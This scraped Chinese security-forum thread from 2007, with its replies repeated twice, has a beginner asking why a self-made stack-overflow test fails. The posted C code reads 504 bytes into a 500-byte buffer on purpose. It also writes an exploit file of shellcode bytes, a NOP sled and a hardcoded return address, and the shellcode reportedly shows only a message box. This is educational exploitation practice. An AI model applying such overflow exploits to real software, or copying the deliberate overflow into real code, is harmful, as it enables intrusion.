[求助]关于溢出的一个问题-付费问答-看雪-安全社区|安全招聘|kanxue.com

最新回复 (8)
大菜一号雪币： 424 活跃值： (10) 能力值： ( LV9，RANK：850 ) 在线值：发帖 58 回帖 1536 粉丝 0 关注私信	大菜一号 21 2 楼在栈中的话，你搞的shellcode是局部变量一般是个全局变量(我是搞全局变量啦) #incoude <xxxxx.h> .... unsigned char shellcode[]={...}; ... xxmain() { ... } 具体的不太清楚，' 干脆把程序发上来，调试一下下 2007-10-18 11:13 0
wormz 雪币： 177 活跃值： (12) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 25 粉丝 0 关注私信	wormz 3 楼不好意思，昨天电脑重装，没看到帖子，我的代码如下 OverFlow函数是读入一个文件并故意溢出， FileWrite函数是写入可溢出的文件，地址是硬编码，不知道是不是每台机子都能运行成功 vc++6 sp6 release 我是新手，刚刚了解溢出还不太懂，希望帮忙看看问题在哪里 void OverFlow() { FILE f; char chBuf[500] = {0}; f = fopen("test.dat","rb"); if (!f) return; fread(chBuf,504,1,f); } void FileWrite() { FILE f; char chSellCode[] = { 0x68, 0x6C, 0x6C, 0x00, 0x00, 0x68, 0x33, 0x32, 0x2E, 0x64, 0x68, 0x75, 0x73, 0x65, 0x72, 0x68, 0x6F, 0x78, 0x41, 0x00, 0x68, 0x61, 0x67, 0x65, 0x42, 0x68, 0x4D, 0x65, 0x73, 0x73, 0x6A, 0x00, 0x68, 0x72, 0x6C, 0x64, 0x21, 0x68, 0x6F, 0x20, 0x57, 0x6F, 0x68, 0x48, 0x65, 0x6C, 0x6C, 0x8D, 0x5C, 0x24, 0x1C, 0x53, 0xE8, 0xB2, 0x1F, 0x6D, 0x7C, 0x0B, 0xC0, 0x75, 0x01, 0xC3, 0x8D, 0x5C, 0x24, 0x10, 0x53, 0x50, 0xE8, 0xD6, 0xAF, 0x6D, 0x7C, 0x0B, 0xC0, 0x75, 0x01, 0xC3, 0x8D, 0x1C, 0x24, 0x6A, 0x00, 0x6A, 0x00, 0x53, 0x6A, 0x00, 0xFF, 0xD0 }; int i; f = fopen("test.dat","wb"); fseek(f,0,SEEK_SET); for (i = 0; i < sizeof(chSellCode); i++) fputc(chSellCode[i],f); for (i = 0; i < 500-sizeof(chSellCode); i++) fputc(0x90,f); fwrite("\x8c\xfd\x12\x00",4,1,f); fclose(f); } int main(int argc, char* argv[]) { // FileWrite(); OverFlow(); printf("Hello World!\n"); return 0; } 2007-10-19 09:07 0
大菜一号雪币： 424 活跃值： (10) 能力值： ( LV9，RANK：850 ) 在线值：发帖 58 回帖 1536 粉丝 0 关注私信	大菜一号 21 4 楼和我想的不太一样 Shellcode,刚开始还以为你说的是CreateRemoteThread `呵呵` 硬编码应该不能每台机子都能运行成功 2007-10-19 11:57 0
wormz 雪币： 177 活跃值： (12) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 25 粉丝 0 关注私信	wormz 5 楼呵,CreateRemoteThread是用到注入的吧,我这个测试程序是本身就故意留个溢出漏洞, 我还是打包传一下文件上来吧,希望大侠们可以帮忙用od跟下,指导一下晕,权限不够不能上传,可以从下面的地址下载 http://www.live-share.com/files/279526/____.rar.html 2007-10-19 17:14 0
knighthui 雪币： 215 活跃值： (26) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 35 粉丝 0 关注私信	knighthui 6 楼这个溢出代码是干什么用的？晕，我在自己机上跑起来了，但是问题是不知道机器有什么变化，是不是加了一个管理员？ 2007-10-19 20:38 0
wormz 雪币： 177 活跃值： (12) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 25 粉丝 0 关注私信	wormz 7 楼不是的,只是弹出来一个messagebox,"hello world!" 没有危害的 2007-10-22 08:54 0
aj3423 雪币： 196 活跃值： (96) 能力值： ( LV6，RANK：90 ) 在线值：发帖 82 回帖 271 粉丝 2 关注私信	aj3423 2 8 楼把你shellcode的源代码贴出来看看 2007-10-22 13:36 0
大菜一号雪币： 424 活跃值： (10) 能力值： ( LV9，RANK：850 ) 在线值：发帖 58 回帖 1536 粉丝 0 关注私信	大菜一号 21 9 楼不是已经贴出来了么 2007-10-22 14:04 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (8)
大菜一号雪币： 424 活跃值： (10) 能力值： ( LV9，RANK：850 ) 在线值：发帖 58 回帖 1536 粉丝 0 关注私信	大菜一号 21 2 楼在栈中的话，你搞的shellcode是局部变量一般是个全局变量(我是搞全局变量啦) #incoude <xxxxx.h> .... unsigned char shellcode[]={...}; ... xxmain() { ... } 具体的不太清楚，' 干脆把程序发上来，调试一下下 2007-10-18 11:13 0
wormz 雪币： 177 活跃值： (12) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 25 粉丝 0 关注私信	wormz 3 楼不好意思，昨天电脑重装，没看到帖子，我的代码如下 OverFlow函数是读入一个文件并故意溢出， FileWrite函数是写入可溢出的文件，地址是硬编码，不知道是不是每台机子都能运行成功 vc++6 sp6 release 我是新手，刚刚了解溢出还不太懂，希望帮忙看看问题在哪里 void OverFlow() { FILE f; char chBuf[500] = {0}; f = fopen("test.dat","rb"); if (!f) return; fread(chBuf,504,1,f); } void FileWrite() { FILE f; char chSellCode[] = { 0x68, 0x6C, 0x6C, 0x00, 0x00, 0x68, 0x33, 0x32, 0x2E, 0x64, 0x68, 0x75, 0x73, 0x65, 0x72, 0x68, 0x6F, 0x78, 0x41, 0x00, 0x68, 0x61, 0x67, 0x65, 0x42, 0x68, 0x4D, 0x65, 0x73, 0x73, 0x6A, 0x00, 0x68, 0x72, 0x6C, 0x64, 0x21, 0x68, 0x6F, 0x20, 0x57, 0x6F, 0x68, 0x48, 0x65, 0x6C, 0x6C, 0x8D, 0x5C, 0x24, 0x1C, 0x53, 0xE8, 0xB2, 0x1F, 0x6D, 0x7C, 0x0B, 0xC0, 0x75, 0x01, 0xC3, 0x8D, 0x5C, 0x24, 0x10, 0x53, 0x50, 0xE8, 0xD6, 0xAF, 0x6D, 0x7C, 0x0B, 0xC0, 0x75, 0x01, 0xC3, 0x8D, 0x1C, 0x24, 0x6A, 0x00, 0x6A, 0x00, 0x53, 0x6A, 0x00, 0xFF, 0xD0 }; int i; f = fopen("test.dat","wb"); fseek(f,0,SEEK_SET); for (i = 0; i < sizeof(chSellCode); i++) fputc(chSellCode[i],f); for (i = 0; i < 500-sizeof(chSellCode); i++) fputc(0x90,f); fwrite("\x8c\xfd\x12\x00",4,1,f); fclose(f); } int main(int argc, char* argv[]) { // FileWrite(); OverFlow(); printf("Hello World!\n"); return 0; } 2007-10-19 09:07 0
大菜一号雪币： 424 活跃值： (10) 能力值： ( LV9，RANK：850 ) 在线值：发帖 58 回帖 1536 粉丝 0 关注私信	大菜一号 21 4 楼和我想的不太一样 Shellcode,刚开始还以为你说的是CreateRemoteThread `呵呵` 硬编码应该不能每台机子都能运行成功 2007-10-19 11:57 0
wormz 雪币： 177 活跃值： (12) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 25 粉丝 0 关注私信	wormz 5 楼呵,CreateRemoteThread是用到注入的吧,我这个测试程序是本身就故意留个溢出漏洞, 我还是打包传一下文件上来吧,希望大侠们可以帮忙用od跟下,指导一下晕,权限不够不能上传,可以从下面的地址下载 http://www.live-share.com/files/279526/____.rar.html 2007-10-19 17:14 0
knighthui 雪币： 215 活跃值： (26) 能力值： ( LV2，RANK：10 ) 在线值：发帖 9 回帖 35 粉丝 0 关注私信	knighthui 6 楼这个溢出代码是干什么用的？晕，我在自己机上跑起来了，但是问题是不知道机器有什么变化，是不是加了一个管理员？ 2007-10-19 20:38 0
wormz 雪币： 177 活跃值： (12) 能力值： ( LV2，RANK：10 ) 在线值：发帖 5 回帖 25 粉丝 0 关注私信	wormz 7 楼不是的,只是弹出来一个messagebox,"hello world!" 没有危害的 2007-10-22 08:54 0
aj3423 雪币： 196 活跃值： (96) 能力值： ( LV6，RANK：90 ) 在线值：发帖 82 回帖 271 粉丝 2 关注私信	aj3423 2 8 楼把你shellcode的源代码贴出来看看 2007-10-22 13:36 0
大菜一号雪币： 424 活跃值： (10) 能力值： ( LV9，RANK：850 ) 在线值：发帖 58 回帖 1536 粉丝 0 关注私信	大菜一号 21 9 楼不是已经贴出来了么 2007-10-22 14:04 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

[旧帖] [求助]关于溢出的一个问题 0.00雪花